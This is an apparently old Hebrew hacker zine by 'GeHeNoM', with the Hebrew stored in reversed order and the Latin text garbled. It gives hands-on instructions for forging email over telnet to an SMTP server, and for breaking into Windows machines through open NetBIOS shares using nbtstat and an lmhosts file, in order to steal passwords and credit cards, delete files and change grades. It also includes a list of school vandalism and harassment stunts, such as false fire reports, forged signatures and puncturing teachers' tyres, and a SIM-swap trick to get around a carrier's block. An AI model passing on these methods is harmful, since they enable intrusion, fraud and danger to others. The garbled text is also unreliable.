תדוקפ איהו !הליעי דואמ הדוקפב םיכמות םיתרש הברה H7P .
.םימעפל דואמ םכל רוזעל לוכי הז .הז םע וקחש .םינוש ראוד יתרש המכב הז תא וסנ
!והשמ םתנבהש הווקמ
GeHeNoM
3;
#ויז Email קלח ' 3
... The Minute that It's Born it Begins to Die
( Marilyn Manson )
.ליימיא ףויזל םלשה #ירדמה לש ןורחאה קלחל םתעגה
םתא לבא !םייוצר יכה אל םג םתאו !אובל םכממ שקיב אל דחא ףא !הפל םינמזומ שממ אל םתא
.ןאכ
תאו .תוישומישו תושדח תודוקפ םכל הארא ינא הז קלחב .ליחתנ ואוב !ןאכ רבכ םתא םא זא
!תמאה
וא ףיוזמ םתלביקש ליימיאה םא קודבל #יא ודמלת םג םתא הזמ %וח .תובינגמ שממ שממ םג
#יא םגו !אל
ונהיתש חוטב ינא .תושדחה תודחוימה תודוקפה םע ליחתנ !בוט .הנוז ןבה ןפייזה תא רתאל
.םתייא קחשל
הפ םכל הארא ינא 3 $םה תודוקפה תשולש .תובינגמ תודוקפ
R3#
0R-L
N66P
!ןושארה R3# תושעל הז ודיקפת ! R3# .וישכע דע תרשל םתחלשש עדימל
אציש םתטלחה םואתפו !ףוסל טעמכ םתעגה !ליימיא ףויז םתלחתה !אמגודל .לכה קוחמל רמולכ
הדוקפה תא דילקהל אוה תושעל םכילעש לכ !הלחתהמ ליחתהל םיצור םתאו ארח R3# .והזו
איה ונלש האבה הדוקפה .שדחמ ליחתהל םילוכי םתא וישכע 0R-L ה תדוקפש המ . 0R-L
תקדוב הז השוע
.תכרעמב םייק םייוסמ שמתשמ םא
ליימיאה תבותכ םא תעדל םיצור םתא אמגודל slutk(ahaV%net%il !תמייק תמאב
$םידילקמו !בהז טנרטניא לש ראודה תרשל םירבחתמ םתא
0R-L slut
ןובשחה םא םכל דיגי תרשה slut םירקמב ליעי דואמ דואמ תויהל לוכי הז .אל וא םייק ןכא
!םימיוסמ
ןוילמ םכל חולשל תוצורש תוירחסמ תורבח הזב םישמתשמ כדב #א
םיטלוק אלו ףסכ הזמ וחיוורי םהש םיבשוח םה יכ תונבצעמ תומוסרפ
.םהלש םינברוחמה םירצומה תאו םתוא אונשל ונל םימרוגו םינבצעמ םאתס םהש
הדוקפה .הנורחאהו האבה הדוקפל !בוט N66P .םולכ ....תושעל הדיקפתש הדוקפ איה
הדוקפה N66P .דואמ %למומ .םכמצעב וסנת .אב בינגמו דחוימש המ הז .םולכ השוע אל
הדוקפה
איה תמאה תא יכ .םולכ השוע אל איה םא תמייק איה המל זא .ראוד יתרש דואמ הברהב תמייק
...והשמ השוע ןכ
#סמ לא טלפ הריזחמ םג כדבו !תרשל תטלקנ דואמ טושפ איה .ןיעל הארנ שממש והשמ אל קר
רמואה םכלש בשחמה
וא !רדסב רוביחהש קודבל ידכ ליעי תויהל לוכי הז !רמולכ .'וכו הלבקתה !הטלקנ הדוקפהש
תוריהמ תא םאתס
...הלאכ תויוטש ינימ לכו ראודה תרש תבוגת
הנוז ןבה רותיאו #יוזמ ליימיא יוליג
.תואדווב םיקדוב #יא .דושח םכל הארנ אוהו ליימיא םתלביק דיגנ וישכע
( םישארב םילכתסמ Headers !הנכות לכ םע הנוש תצק הז .הז תא םישוע #יא .בתכמה לש )
:*
( תויורשפאב היצפואה תא ושפחת לבא 3ettings הלאל םג לנכ .םכלש ראודה תנכות לש )
םהלש ליימיאהש
אוה web based e4ail ב אוה םהלש ליימיאהש רמולכ . New4ail וא Hot4ail !וישכע .'וכו
םתינישש ירחא
ה תא תוארהל םכלש ראודה תנכות לש תורדגהה תא Headers תאירקל ורביע !ליימיא לכ לש
םכל הארנש ליימיאה
ב וננובתהו !דושח Headers האריי הזש חינהל ריבס !תאז םישוע םתאש הנושארה םעפה וז םא .
םאתס ומכ םכל
.םכל רוזעל הלוכיש הליעי היצמרופניא םצעב הז לבא .תילגנאב תויוטש
( םישארה ראוד תנכות לכב !ןכבו Headers יוליגל םיפיט המכ הפ ןתא ינא ןכלו !הנוש תצק ואריי )
ףויז
!ןושאר רבד !ןכבו .אל וא ףיוזמ הז םא תולגל השק דואמ םהבש תונכותב םג ודבעיש ליימיא
!יתימא ליימיאב
.םיכורא כדב ויהי םישארה ןכל .ראוד תנכות יע חלשנ הז יכ תורדגהו םירבסה רתוי כדב ויהי
הברה היהי םהו !םישארב םיטרפ הברה היהי אל !תינדי כדב השענש !תאז תמועל ףיוזמ ליימיאב
.םירצק רתוי
ןיב הפ הוושנ .רחא והשמ וארת ואוב וישכע 9 ל דחא .ימצעל יתחלשש םיפיוזמ םיליימיא
altaVista%co4
ל דחאו hot4ail%co4 .
ב דחאה תא םדוק הארנ ואוב hot4ail%co4 $
-ro4 ad4inkhot4ail%co4%co4 3at $ec *; +Jh3:h9+ 9***
ReceiVedh Qro4 [9+9%+N;%+.J%++*] b) hot4ail%co4 X3%9Y q 3at $ec *; +Jh39h=: 9***
3ubeecth &ongradulations
$ateh 3at $ec *;
אוהש ןעוט חולשה םיאור םתאש ומכ "d4inkhot4ail%co4%co4
איה ולש יפ ייאה תבותכש בותכ לבא 9+9%+N;%+.J%++*
לש יפ ייאה תא קודבנ םא hot4ail%co4 ללכב הזש הארנ J:%:%++%N
לש תבותכה תא קודבנ םא ןכ ומכ .םינוש דואמ םיבשחמ יתש הפ ונל שי רמולכ
9+9%+N;%+.J%++* ונחנא
םצעב הזש הארנ b(O!+.J!++*%be(eOint%net ונספת 00םוב00 .ימואלניב קזב לש שמתשמ רמולכ .
.ותוא
$המוד דואמ בצמה הטזיו הטלאב וישכע
-ro4h ad4inknba%co4

$ateh 3un ++ NoVe4ber
3ubeecth &ongradulations
ReceiVedh Qro4 unknown XH76 nba%co4Y X9+9%+N;%+.J%++* )
b) s4tI%altaVista%co4 X9*;%99.%+3%;:Y with 3M#Pq ; $ec 9*** +Jh:Jh9* !*.**
אוהש ןעוט חלושה םעפה ad4inknba%co4
לש יפ ייאה תא קודבנ ןכל nba%co4 הזש ונל ררבתמו 9*:%9*9%+9.%993
ל המוד שממ אלש המ 9+9%+N;%+.J%++* ימואלניב קזב לש שמתשמ ותוא תויהל ררבתמ רשא
.םדוקממ
.בתכמה תא לביקש ראוד תרשה תבותכ תא ןאכ ונל שי ןכ ומכ 9*;%99.%+3%;:
...הז םע וקחש .בתכמה חלשנ יתמ לש םיקיודמה העשהו #יראתה תא םילבקמ ונחנא
תא אורקל %ילממ שממ שממ ינא !בוש R-& .9+ תילגנא עדויש ימ לכל
:+
ה תאירק .ליימיאב עדיה תא קימעהל הצור םאתסש וא R-& לש הנבה רתוי הברה םכל ןתית
.אשונה
ש הווקמ 3 !והשמב םכל ורזע ליימיא לע הלאה םיממעשמהו םיכוראה םידומעה
GeHeNoM
:9
#ויז ךירדמ Email רצוקמ

,$$$$$ """וניבתו ףוסה דע וארקת .אורקל וקיספתו םיניבמ אל םתאש ודיגת לא - הרעה $$$$$+
!ןבומ אל לכה הלחתהב יכ .ףוס ףוס ףוסה דע וארקת !ונממ הצור ינא המ ןיבה אל דועש ימל $$+
,$$
ילב .ףוסה דע הלחתההמ וארקת וישכע זא .הפי .ןבומ ןכ לכה זא ףוסה דע םיארוק םאו $$+
,$$ .עצמאב קיספהל
.ףוס .ףוס .ףוסה דע וארקת .םולכ םיניבמ אלש םיבשוח םתא םא םג .ףוסה דע וארקת !בוש
.ףוס
!םכלש אמיא סוכ םינלצע תונוז ינב אי !יקוא
אורקל חוכ ןיא םכבורלש ללגב זא 3 .רצוקמ #ירדמ הפ יתבתכ ליימיא ףויז לע םיאלמ םידומע
.םיריכמ םתאש םדאנב לכל קתוע ונת .הזה #ירדמה תא וציפת .ונממ םינהנ אל םתאש םכל רסח
.ליחתנ !בוט
טרופל !ראודה תרשל םירבחתמ $תוארוה 9= $תואבה תודוקפה תא םיבתוכ םש .
H76
Mail -ro4h hackerkHackers%co4
RcIt #oh Victi4k0icti4%co4
$ata
3ubeecth -ake 4ail
$ateh Mon 93 6ctober
#his is a Qake e4ail
HaVe a nice da) )ou bitch
.
Ouit
$םירבסה המכ וישכע .בוט
hackerkHackers%co4 ליימיאה תא חולשל םיצור םתא הנממש תבותכה תא םוקמב ובתכ &
Victi4k0icti4%co4 ףיוזמה ליימיאה תא לבקתש תבותכה תא םוקמב ובתכ &
-ake 4ail )רבד ותוא( .םיצור םתא םא תרתוכה וא .ליימיאה לש אשונה תא ןאכ ובתכ &
Mon 93 6ctober .ןבומכ העש ףיסוהל םג רשפא .#יראתה תא ןאכ ובתכ &
ינפל חלשנ הזש בותכל םג רשפא +*** תנשב !#פהה וא הנש :*N9 םע וקחש .םיצור םתאש #יא !
.הז
#his is a Qake e4ail
HaVe a nice da) )ou bitch .תירבעב םג רשפא .ומצע בתכמה תא ןאכ ובתכ &
.תירבעב בותכל רשפא )םיצורש םכמ הלאל תרתוכה וא( אשונה תא םג !בגא #רדו
טרופל ראודה תרשל םירבחתמ #יא $תמאב הנורחאו !הנורחא הרעה קר 9= ..
$הככ
לחתה לע וצחל 0
...הלעפה לע וצחל 0
:3
$ודילקה 0 telnet serVer 9=
serVer ראוד תרש לש תבותכ &
היה ראוד תרשהש חינהל ריבס םדוקמ אמגודה תא חקינ םא !אמגודל 4ail%Victi4%co4
$םידילקמ םתייה ןכלו telnet 4ail%Victi4%co4 9=
$תוצופנ תבותכל תויורשפא דוע
s4tI%Victi4%co4
!היה רבכש המ 4ail%Victi4%co4
ביבח ןורחאו Victi4%co4
ב והשימל םיפייזמ םתא דיגנ זא altaVista%co4 $ודילקת םתא telnet 4ail%altaVista%co4 9=
וסנת דבוע אל םאו s4tI%altaVista%co4 טושפ זא !אל הז םג םאו altaVista%co4 !טושפ !טושפ
.טושפ
ה לש האלמה הבתכה תא וארקת !תויעב שי םא 3 !םכלש .ונהית .והז .םידומע
GeHeNoM
::
' רפס תיבב תושעל םיפייכ םירבד 2
אשונב הבתכ דוע בותכל טילחה רתאה תווצ !ןושארה קלחה לש תוירלפופה רואל
וניבתש םיווקמו !ונהיתש םיחוטב ונחנא .'רפס תיב ארקנה ןברוחמה םוקמב תונהיל #יא'
.חומה לע םכל טלתשהל תונוז ינבל ונתית אלשו !תמאב םתא ימו םכליבשב בוט תמאב המ
$שארל ונל וצפקש תונויערה לכ הנה !המדקהה םע סלאח !בוט
.רפסה תיבב םילוענמה לכ לע תובידנב ותוא וחרימו !עגמ קבד וחק 0
!םיסנמו !םיסנמ טושפ םה .לוענמל חתפמה תא סינכהל םיסנמ םירומה #יא וטיבת כחא
...םיסנמו
.סקפיט םע #סמה לע ורייצ !רפס תיבב היזיוולט םכל שי םא 0
!םכלש עגמ תושדעה תא םישפחמ םתאש ונעטתו !םירבח המכ וחק !םיאלמ תונורדסמהשכ 0
...הז לע #ורדל תועטב לוכי והשימ יכ !זוזי אל דחא ףאש דואמ בושחשו
.להנמה רדח לשו םירומ רדחה לש תלדה לש תידיה לע יקק וא !%וב !קבד !ןותפש וחרימ 0
!םיינש וא רודכ ועלבת !להנמה רדח דיל וכל .שחנ תשקה דגנ תופורת תחקרמ תיבמ וסייכ 0
.המינפ וסנכיתו
.םש אצמנש המ לכו !םירפס !חיטשה !אסיכה לע איקהל ולדתשת .איקהל םכל םורגת הפורתה
.םירבחל וקלחו ןיינעמ רבד לכ לש םיקתוע ומלצ .םכלש םירומה לש ראודה תובית תא וצרפ 0
ישפוח ושיגרת
רפסמ הז !לזמ םכל היהי םא !בינגמ יכהו !ואצמת םימעפלש ןמוזמ ףסכ !םיק'צב שמתשהל
.יארשאה סיטרכ
קדצה םוי הז יעיבר םוי ש #כ לע םוקמ לכב םיזמרו םיקתפ וריאשה 0
.םולכ ושעת לא יעיבר םויב 0
.םולכ ושעת לא ישימח םויב 0
.םולכ ושעת לא ישיש םויב 0
!תיצמ !ןיזנב !שיטפב דייטצהל %למומ .םיאור םתאש המ לכ וסרהתו רפס תיבל וכל תבשב 0
.בוט חור בצמ הברהש תמאב לבא הברה הברה הברהו !ןיכס
!)'וכו !םירושיא !םינחבמ !תועדוה( םכלש הרומה תמיתח םע םימותח םירבד רתויש המכ וגישה 0
.ולש המיתחה תטיש תא לגרתל תוסנל וליחתתו תועש המכ לכה םע ובשו
.דואמ ישומיש והשמכ ולש המיתחה תא ואצמת !תיתוכיא ףויז תמרל ועיגתשכ
.ןבומכ םנובשח לעו םמשב תאז ושע .תיבל הציפ םליבשב ונימזהו !םכלש םירומל םידמחנ ויהת 0
תותשל וצריי םג םהש בשוח ינאו !תופסותה לכ םע הלודג תיתחפשמ הנמ ןימזהל וחכשית לא
.הברה
...#כ רחא הדילג תצק םג וצריי םג םה ילוא יכ !הדילג וחכשת לאו
!הציפה םע עקתיהלו םלשל וצלאנו !חולשמה שיא לע תועש וקעצ םהש ירחא 0
חבטמב הפירשמ םתוא ליצהל ואוביש שאה יבכממ רוקיב לבקל וחמשי םהש חוטב ינא
...ןופלטה #רד שאה יבכמל הילע רפסל וצריתש תרחא הפירש לכ וא
םע רויכב זקנה תא ומתסו רפסה תיבב םיתורישל וכל 0
!םויה ףוסב תאז ושע .זרבהמ ררחתשהל םימה לכל ונתו הנילטסלפ
....םימ ףצומ היהי רפס תיבה לכ תרחמל םויב .התיבה וכלה רבכ םלוכש ירחא
:=
.המכוחב תאז ולצנ .םינגומ אל תומוקמו םיבצמב םהלש ןמויה תא ריאשהל םיטונ םיבר םירומ 0
םישימח האמ !האמכ קושב הלוע למס לכ .םכלש םירומה לש תוינוכמהמ םילמסה תא ושלתת 0
.לקש
.םכלשמ ףסואל םתוא ופיסוה וא םינפסאל םילמסה תא וריכמ
.םירומה רדח דיל וא ןורדסמב ולחנתהו הבכשה לכ לש התיבש ונגראת 0
.םכלש םירומה לש תוינוכמה לש םילגלגב םיר'צנפ ושעתו םיינש וא רמסמב ודייטצה 0
...רתוי לודגל ףיכה תא #פוה הז .תיארקא הרוצב תרחא תינוכמ ורחבת םוי לכ
.רפסה תיבב ישפוח בבותסהל םיאנס וא םילוגנרת המכל ונת 0
תוחפלב ושמתשה = .חבושמ הז ירה הברמה לכ יכ ורכזו םיאנס(םילוגנרת
ןולב !ןמיקופ תבוב !עוצעצ תינוכמ !סינט רודכ ומכ םיצפח ינימ לכ וסינכהו םיתורישל וכל 0
!חפונמ
רשפא יא רבכש דע בושו בושו בוש תאז ושע .םימה תא ודירוה ןכמ רחאלו הלסאה #ותל 'וכו
.םימה תא דירוהל
םתוא ליעפהל וחכשת לא .רפסה תיבב םירתסומ תומוקמ ינימ לכב םיררועמ םינועש וחינה 0
.םדוק
רוזאל ברקתיו הרומשכ .הפצרה ןוויכל םינפה לע בכשי דליש ונגראת 0
וא תישילש המוקב ןולח ןוויכל ועיבצהו %פק אוה !"%פק אוה ומכ והשמ תוירטסיהב וחריצ
.והשמ
!רפסה תיבב דלי הזיא לש אבאה םתאש םינפ ודימעתו רפסה תיבל ןופאלפהמ ורשקתה 0
הביסמ שי יכ וא הרטפנ אתבס יכ רהמ רוזחל #ירצ אוהשו התיבה 1וישכע1 ותוא וחלשיישו
יטומ דודל תיתחפשמ
ללגב הזש דיגהל רשפא םומיסקמ .םכלשמ תוביס לע ובשחת .%ילפהל וטילחתש רחא רבד לכ וא
יתחפשמ עוריא
.'וכו ישיא והשמ הזש וא
.....חחחחחחחחחחחחחחחחחחחחחחחפ 0
.האבה '0'ל ורבעת !ונ .םתקדצ ....דוע שיש םתבשח
.בוט רתוי הובג רתויש המכ רשאכ !רפסה תיבב תישילש וא היינש המוקל וכל 0
$םיאבה םיקוחה פע תוקיריה קחשמ תא וקחש תעכ
הדירומ הדלי(דליב העיגפ - 3 תודוקנ
הפיסומ הרומב העיגפ - +* תודוקנ
הדוקנ הפיסומ םייח לעבב העיגפ -
םולכ השוע אל רחא רבד לכב העיגפ -
$תונורחא תורעה
.םכתא ואריי אלש ידכ הקירי לכ ירחא ףפוכתהל %למומ
ל ןושאר עיגמש ימ אוה חצנמה =* .תודוקנ
.םייונישל םיחותפ םיקוחה לכ
.ונהית .)אלש וא( תודוקנ רבוצו ורותב קרוי דחא לכ $האבה #רדב לעופ קחשמה ןיבה אלש ימל
תומוקמ ינימ לכב םתוא ואיבחה תעכ .חמקב םתוא ואלמו תופוקש ןוליינ תויקש המכ וחק 0
ודיחפיש
#ותב !רמלק #ותב !רפסל תחתמ !רפס הזיא עצמאב םה םיצלמומ תומוקמ .םתוא אצמייש ימ תא
קנרא #ותב !קית
:J
הרקמל םשו הפ חלמ תצק ומישת םגש %למומ .םכלש הרטמה םהש םידליה לש רחא םוקמ לכ וא
ףינסהל וסני םהש
....סססככככייייייייייייייאאאאא ו ווווווווו'צפ הההההההאאאאא הברה ועמשת זאו רמוחה תא
.תונורחאה שולש םייתנשב חכשנ תצק לבא םיריכמ םלוכש והשמ !םויסלו 0
.קיטסלפ תישק ןיעמ םכל ראשייש #כ ולש תווצקה ינש תא וקרפו !)דרול( שוט וא !תע וחק
ינשה הצקב קזח ופשנת וישכע .דחא הצקב ותוא ומישו הנילטסלפ לש ןטק רודכ ולגלג תעכ
.ףועת הנילטסלפהו
.ריינב שמתשהל רשפא דימת הנילטסלפ ןיא םא .בוט ןווכלו ףיעהל ודמלתש דע תצק הז םע וקחש
.בוט רתוי ףע אוה הככו םירויש ינפל ותוא ביטרהל %למומ
.ופט ופט םיארוק הזה הנהמה #א רגפמה קשנה ילכל !ריכמ אלש ימל
.'רפסה תיבב ףייכל #יא' לש ינשה קלחה םת ןאכ !והז
!םיקתוע תורשע המכ ומלצת !וישכע םתארקש המ תא וסיפדת
.ונהיתו !םירבחל וקלחת
!םכלש
GeHeNoM
:N
קו גיבב םינוקייא
תורישב שמתשהל םילוכי אל םהש #כ לע !תונולת הברה !םישנא הברהמ יתעמש !ןורחאה ןמזב
ה םע םיקוט גיבה לכל !ןכבו .קוט גיב םהל שיש הטושפה הביסהמ 'גנרוא לש םינוקייאה =++*
לפאה דצה יקמעממ יכ .םתיעט זא !םילוכי אל םהש ובשחו ןופאלפב ןוקייא םישל םיצורש !םהלש
םע !םכילא אב ינא !םוניהיגה לש +**l לע תומרל #יא םכל האריש !םוניהיג אוה ינא !רוהט עור
.תונוז ינבה
אל ילש םימכחה םיארוקה םתא #יא ןיבהל השקתמ ינאו !רתויב הלקו הטושפ הטישה !ןכבו
.דבל הז לע םתבשח
הטילחה המ םושמ 'גנרוא !המ לבא .םינוקייאב שמתשהל לגוסמ םכלש םגדה !תינכט !הככ זא
.עדוי אל .המל .לוכי אל !קוט גיב ול שיש ימש
.םתוא םיקפוד #יא זא
!םגד ותואמ !רחא והשימ לש ןופאלפ וחק
שי םכל םא( J++* וחק זא ! J++* םכל שי םא . =++* וחק זא ! =++* )
!םגד ותואמ וחק בינגמ רתוי היהיש םאתס לבא !םגד ותואמ תויהל בייח אל הז םצעב
היהי אל םינוקייאה תוריש ולצאש הככ !קוט גיב תורישב םושר היהי אל הזה ןופאלפה לעבשו
.םוסח
...הנשמ אל הז !החפשמ 'גנרוא !וי יב 'גנרוא היהיש .קוט גיבמ %וח רבד לכ תויהל לוכי הז
ה סיטרכ תא ותייא ופילחה וישכע si4 .
סיטרכ םיפילחמ #יא si4 .
.רישכמה תא ובכת לכ םדוק
ה קיזחמ תא וארת םשו !ןופאלפהמ הללוסה תא ואיצות וישכע si4 .
!דצב ותוא ומיש תעכ .סיטרכה תא תונידעב ופלישו !ותוא וחתיפ
.ינשה ןופאלפהמ סיטרכה תא םינפב וסינכתו
.ןופאלפה תא וליעפהו !םוקמל הללוסה תא וריזחה
!םכל ןיא עגרכ תינכט הניחבמ יכ !קוט גיב םכל שיש ההזת אל 'גנרוא וישכע
.םכל אבש ןוקייא הזיא םכמצעל וחליש ןכל
ה סיטרכ תא הרזחב ופילחה !הצצפ ןוקייא םכל םתפסוהש ירחא si4 ןוקייאה .המ ושחנו !
.ראשיי
!ווונהתש דווואמ הווקמ .סיטרכה לע אלו רישכמה לע רמשנ אוה יכ .המל
GeHeNoM
:.
םיבשחמל הצירפ
!תירבעבו דעצ רחא דעצ םכל ריבסהל דמוע ינא !ןוכנ הז !ןכ
.םירחא םיבשחמל %ורפל ולכות !תיבב םכלש ישיאה בשחמהמ #יא
תנברוחמ םיבשחמ תשר הנשי !אמגודל םכלש רפסה תיבבש חינהל ריבס !ןכבו
סודניוו םע םיבשחמ ןומה לש ;=/;. רוביח הזיא םע םירבוחמ םלוכש
תרש #רד )רתוי וא תוחפ( ריהמ N# תחא תספדמ קר הנשי הלאה םיבשחמה לכל יכו
בשחמ לע !תוירפס המכ םג שיו !תספדמב סיפדהל םילוכי םיבשחמה לכ #א !םיינש וא
דרשמ לכב וא רפס תיב לכב #כ אל הז .םהילא השיג שי םיבשחמה לכלש !תרשה
.םיבר םירקמב #כ הז לבא !סודניוו םע םיבשחמ תשר לכב וא !יכוניח דסומ לכב וא
.וזכ הרוצב היונב התייה םהלש םיבשחמה תשרש רפס יתב ןומהל יתרדח
.דבוע הז לכ לזאזעל #יא זא
םע םיצבק וא תוספדמ ףתשל תורשפאה תא סודניווה םע דחי הקישה טפוסורקימ
רטמ יצח קחרממ םיבשחמ תויהל םילוכי הלאה םירחאה םיבשחמה .םירחא םיבשחמ
תויהל לוכי הזו !לבכ םע םיפותישה תא ליעפהש בשחמל םירבוחמש
.םידוהיה תנידמ !תרחא הנידמב ללכב אצמנש תיבב םכלש בשחמה
ה לקוטורפ לע םיססובמ םיפותישה 3MB רשקתל םינוש םיבשחמל ןתונה לוקטורפ אוהש
םג לוכי הרידח יעצמאכ םיפותישב שומיש ןכל .טנרטניא לוקוטורפ לכ ומכ םהיניב
ב תכמות סקוניל( סקוניל םע בשחממ תושעיהל 3MB .)
.םולכ .דירוהל םיכירצ םתא הנכות הזיא לבא !ליחתהל םיתמ רבכ חטב םתא זא !בוט
םייוכיס םנשי !בורצ םכלש סודניווהש הרקמב .סודניווה םע דחי אב לכה
סודניוו לש הנקתהה קסיד לש ירוקמ קתוע םכל גישהל וצלאיתש ;=/;. .
.הז ילב םג ורדתסת הארנכ לבא
הרקב חול 7- תורדגה 7- לחתה לע וצחל !ןפוא לכב
.תספדמל םירבוחמש םיבשחמ לש למס םע 'תשר' םשב %בוק ושפחת .תויוטשב אלמ הרקבה חול
תשר יביכר יכ וארת םתא .שדח ןולח םכל חתפיי .רבכעה םע םיימעפ 'תשר'ה לע וצחל
ןוגכ #&P/,P ו $ial!MI "daIter .בשחמב םכלצא םינקתומ
ה לוקוטורפב שמתשהל ולכותש ידכב 3MB ש םיכירצ םתא 3 םיאבה תשרה יביכר
$בשחמב םכל םינקתומ ויהי
0 #&P/,P
0 NetBM,
0 &lient Qor MicrosoQt Networks
.ותוא ףיסוהל םיכירצ םתא !םיביכרה תמישרב אצמנ אל הלא םיביכרמ דחא םא
םירחא םיבשחמ לע םיפותישל רבחתהל םילוכי םכניא !הלא םיביכר תעברא לכ ילב
.ביכר לכ תנקתהל תוארוה הפ ןתא ינא זא .ארח .םהלש םיצבקל השיג םכל ןתונ אלש המ
םע ןיאו רומג רדסב הז !הפ יתנייצ אלש !םינקתומ םיביכר דוע םכל שי םא !בגא #רד
...םכל רסח ילואש המ תא ןיקתהל ידכ זא !בוט .היעב םוש הז
#&P/,P
'...הפסוה' רותפכה לע וצחל !הז ביכר םכל רסח םא
7- טפוסורקימ 7- לוקוטורפ ב ורחב #&P/,P .דוא-מ םיע-ט .הפי .
NetBM,
:;
'...הפסוה' רותפכה לע וצחל !הז ביכר םכל רסח םא
7- טפוסורקימ 7- לוקוטורפ ב ורחב NetBM, .דוא-מ .םימ-ח .הפי .
&lient Qor MicrosoQt Networks
'...הפסוה' רותפכה לע וצחל !הז ביכר םכל רסח םא
7- טפוסורקימ 7- חוקל ב ורחב &lient Qor MicrosoQt Networks .האעב .ליעג-מ .
.םכלש הנושארה הצירפל םינכומו טעמכ םתא םיביכרה תשולש תא םכל שיש וישכע זא !בוט
תורשפאב ורחב $תשרל תישאר הסינכ ל תחתמ &lient Qor MicrosoQt Networks .
ה רותפכ לע וצחל תעכ 6/ ה שקמ לע ושיקה טושפ וא nter תא ליעפהל ושקבתת םתא .
.הרקמ לכב תאז ושע !תאז תושעל םכממ שקיבש ןולח חתפנ אל םא .תאז ושע .שדחמ בשחמה
!יארשא יסיטרכ !תואמסיס גישהל רבכ םיצור םתאו !שדחמ סודניוול םתסנכנ !בוט
!םיצבק םירחאל קוחמל !םינויצ תונשל !םיישיא םיבתכמ !תונכות !םיקחשמ
...םיצרופ לזאזעל #יא זא
.םיטא'צה םלועב םויכ רתויב תוצופנה תולאשה תחא תאז העוט אל ינא םא
.רודחל םינווכתמ םתא וילאש בשחמ לש יפ ייא תבותכ ואיצמת זא !בוט
$ודילקהו !סוד ןולח וחתפ !טנרטניאל םירבוחמ םתאש וקדבת
nbtstat !" iIaddress
$אמגודל
nbtstat !" +9N%*%*%+
ה ש בושח " ' היהי - " ' אלו ' a .'
$הבוגתכ ולבקת םא !הרקמ לכב
Host not Qound
םתא לזאזעל #יא םילאוש םתא זא .הז בשחמל רודחל ולכות אלש רמוא הז
...רודחל ולכות ןכ םהילאש םיפותיש םע םיבשחמ אוצמל םירומא
.םלועב בשחמ לכל רודחל רשפא ותייאש דחא דוק וא הטיש ןיאש הפ וניבתש בושח !ןכבו
.תמיוסמ תכרעמב םיוסמ החטבא רוח לוצינל תמיוסמ #רדל הבוט אמגוד תאז
.םימיוסמ םיבשחמל רודחל םכל ןתונש המ
םכל שי !ןכבו 9 $תויורשפא
.)רפס תיב $אמגודל( םיפותיש ול שי יכ תואדווב םיעדוי םתאש םוקמל הרידח 0
.אצומ הזש המל רודחל זאו !םיפותיש קרוסב שומיש 0
$ודילקהו !סודל ורזיח !םיפותיש םע בשחמ לש יפ ייא תבותכ םכידיב שישכ זא
nbtstat !" iIaddress
םוקמב רשאכ iIaddress $הככ #רעב תיארנש הלבט ולבקת םתא .יפ ייאה רפסמ תא
=*
NetB,63 Re4ote Machine Na4e #able
Na4e #)Ie 3tatus
---------------------------------------------
&6MPM#R r**j MN,gM Registered
86R/GR6MP r**j GR6MP Registered
&6MPM#R r**j MN,gM Registered
M"& "ddress n **!**!**!**!**!**
ל םירפסמה לכ תא יתפלחה םיאור םתאש ומכ ** .
םש םיאור םתא רשאכ .7/ ה ןיבש םיספאב היינש ודקמתתש הצור ינא
רפסמה תא 9* / רמולכ ! 9* .םיהדמ המכ .םיפותיש םימייק !הז בשחמלש רמוא הז !7
!יזכרמה תרשה לש יפ ייאה תבותכ תא םתקדב !רפס תיבל םתכלה זא !יקוא
רפסמה םע הלבט םתלביק תיבבו !םיפותיש םע בשחמ םתאצמו !קרוסב שומיש םתישעש וא
/ 9* !בר לאיצנטופ םע בשחמ הפ םכל שי יכ הדבועה םצע תא רשיאש המ 7
$אבה רבדה תא תושעל ןמזה עיגה !םירקי םיטסיכרנא וישכע
$%בוקה תא וחתיפ
&h<windows<l4hosts%sa4
טסקט #רוע םע ותוא וארק 9 ! 3 .ארונ אל !םולכ םשמ םתנבה אל םא .םימעפ
םש ודילקהו ...הלעפה 7- לחתה לע וצחל תעכ noteIad ה שקמ לע וצחל . nter .
.%בוקה לש ןימיל לאמשמ םידילקמ םתאש וגאדת .ונלש ביבחה #רועה תא םכל חתפיי הז
$אמגודל .םיפותיש םתאצמ ובש בשחמה לש יפ ייאה תא םש ודילקה
+9N%*%*%+
$אבה םשב %בוקה תא ורמיש תעכ
&h<windows<l4hosts
.#כ טושפ
!הילא %ורפל םכנוצרבש תחא יפ ייא תבותכמ רתוי םכל שי םא
ה שקמ םע( הרושה תדרוה תרזעב תבותכל תבותכ ןיב ודירפת זא nter )
$#כ תואריהל רומא םכלש %בוקה
+9N%*%*%+
++9%+N;%+=%;
3N%+*=%+%+N
!וישכעו !רומש %בוקה תא םכל שי זא !בוט
בשחמ 7- שפח 7- לחתה טירפת לע וצחל ...ול םתיכיחש עגרל
בשחמה לש יפ ייאה תא הב ודילקה !הנטק טסקט תבית םע שדח ןולח םכל חתפיי
$אמגודל !%ורפל םכנוצרב וילאש +9N%*%*%+ יפ ייאה תא םתרמשש יפ ייאהש ירחא תאז
%בוקב &h<windows<l4hosts ה שקמ לע ושיקה . nter .תצק וכחו
.רבכעה םע םיימעפ וילע וצחל .בשחמ םכל אצמיי הז המ ןמז רחאל
"""םכלש אוה וליאכ קוידב בשחמב שמתשהל םכל ןתייש חתפיי שדח ןולח
םיכירצ םתא !םכלש ןושארה %ורפה בשחמה לש םיצבקב םיטטחמ םתא ובש !הז עגרב
"הז תא םתישע .תובהלתהו !החמש !הוואג אלמ םוצע שגר שיגרהל
.רחא והשימ לש גניקאה תנכות תדרוה אלל .ינאיורט סוסב שומיש לכ אלל בשחמל םתצפ
.ןייטחס .םכמצעב !הז תא םתישע
$תוצופנ תויעבו תולאש
=+
.הקיחמה תא רשאמ אל הז !םיצבק תונוז ינבל קוחמל הסנמ ינא רשאכ $ש
קר םכל היהי ןכלו !םיפותישב הביתכה לש תורשפאה תא ולטיבש םיבשחמ םנשי $ת
םיניינעמ םירבד קיתעהל ולכותו םיצבקה לכל השיג םכל שיש רמואש המ האירק תשיג
!םירבד םהל קוחמל וא םהילא םכממ םיצבק קיתעהל ולכות אל לבא !ישיאה םכלש בשחמל
תויהל הלוכי ןיידע דבלב האירק לש תאזכ השיג .םהלש בשחמב יוניש לכל םורגל וא
ולכות לבא !הדועתב ןויצה תא רפס תיבב והשימל תונשל םכל ןתית אל איה .רתויב הליעי
.שארמ תובושתה םע םינכומ ויהיש הככ םלוכל ותוא קלחלו אבה ןחבמה לש קתוע גישהל
.אמסיס שקבמ הז !אצמנש בשחמה לע םיימעפ %חול ינאשכ $ש
